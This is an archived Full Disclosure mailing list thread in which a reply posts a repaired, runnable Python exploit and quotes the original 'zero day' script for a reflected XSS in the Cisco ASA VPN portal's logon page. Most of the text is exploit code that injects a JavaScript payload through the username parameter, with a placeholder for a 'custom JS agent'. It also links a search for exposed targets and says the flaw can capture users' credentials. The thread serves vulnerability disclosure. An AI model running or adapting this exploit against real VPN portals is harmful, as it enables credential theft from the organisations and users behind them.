Full Disclosure mailing list archives
Re: Cisco ASA VPN - Zero Day Exploit
From: Joey Maresca <jmaresca () gmail com>
Date: Thu, 18 Feb 2016 10:03:56 -0600
For folks who want code that runs, I did you all a favor, fixed the ident issues, removed unused libraries, fixed SSL certificate validation checks causing failures, fixed typos that prevent running, killed dead code, made sure it actually used the Port input. All while stripping out the unnecessary fluff. It may not be perfect but it will at least now run. import string, sys import ssl, socket, httplib if __name__ == '__main__': try: Target = sys.argv[1] Port = int(sys.argv[2]) # Here goes your custom JS agent code Payload = "alert(1)" VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_" CraftedRequest = VulnerableURL # Start the connection connection = httplib.HTTPSConnection(Target,Port,context=ssl._create_unverified_context()) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data = Response.read() vulnerable = "Target is not vulnerable" for line in str(data).splitlines(): if "juansacco" in line: vulnerable = "Targer is vulnerable" if vulnerable != "Not vulnerable": print "Result of the test:", vulnerable # Find the injection on the response connection.close() except Exception,e: print "Exploit connection closed " + str(e) On Wed, Feb 17, 2016 at 4:11 AM, Juan Sacco <juansacco () gmail com> wrote:
# Exploit author: Juan Sacco - jsacco () exploitpack com # Affected program: Cisco ASA VPN Portal - Zero Day # Cisco ASA VPN is prone to a XSS on the password recovery page. # This vulnerability can be used by an attacker to capture other user's credentials. # The password recovery form fails to filter properly the hidden inputs fields. # # This Zero Day exploit has been developed and discovered by Juan Sacco. # Exploit Pack - Team http://exploitpack.com # # Release Dates: # Reported to Cisco PSIRT Feb 4/2016 # Cisco Dev Team working on a fix Feb 15/2016 # Cisco PSIRT report a CVE Feb 15/2016 # Exploit Pack disclose the bug Feb 15/2016 # Disclosure of the Exploit Feb 16/2016 # # Look for vulnerable targets here: https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F # More than 18.000 results in Google only import string, sys import socket, httplib import telnetlib def run(): try: Target = sys.argv[1] Port = int(sys.argv[2]) # Here goes your custom JS agent code Payload = "alert(1)" VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_" CraftedRequest = VulnerableURL # Start the connection connection = httplib.HTTPSConnection(Target) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data = Response.read() vulnerable = "Target is not vulnerable" for line in str(data).splitlines(): if "juansacco\\\"" in line: vulnerable = "Targer is vulnerable" if vulnerable != "Not vulnerable": print "Result of the test:", vulnerable # Find the injection on the response connection.close() except Exception,e: print "Exploit connection closed " + str(e) if __name__ == '__main__': print "Cisco VPN ASA Exploit - Zero Day" print "################################" print "Author: Juan Sacco - jsacco () exploitpack com" try: Target = sys.argv[1] Port = sys.argv[2] except IndexError: pass run() _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Cisco ASA VPN - Zero Day Exploit Juan Sacco (Feb 18)
- Re: Cisco ASA VPN - Zero Day Exploit Joey Maresca (Feb 22)
- Re: Cisco ASA VPN - Zero Day Exploit Mark-David McLaughlin (marmclau) (Feb 22)
- Re: Cisco ASA VPN - Zero Day Exploit Daniel Hadfield (Feb 22)
- Re: Cisco ASA VPN - Zero Day Exploit Joey Maresca (Feb 25)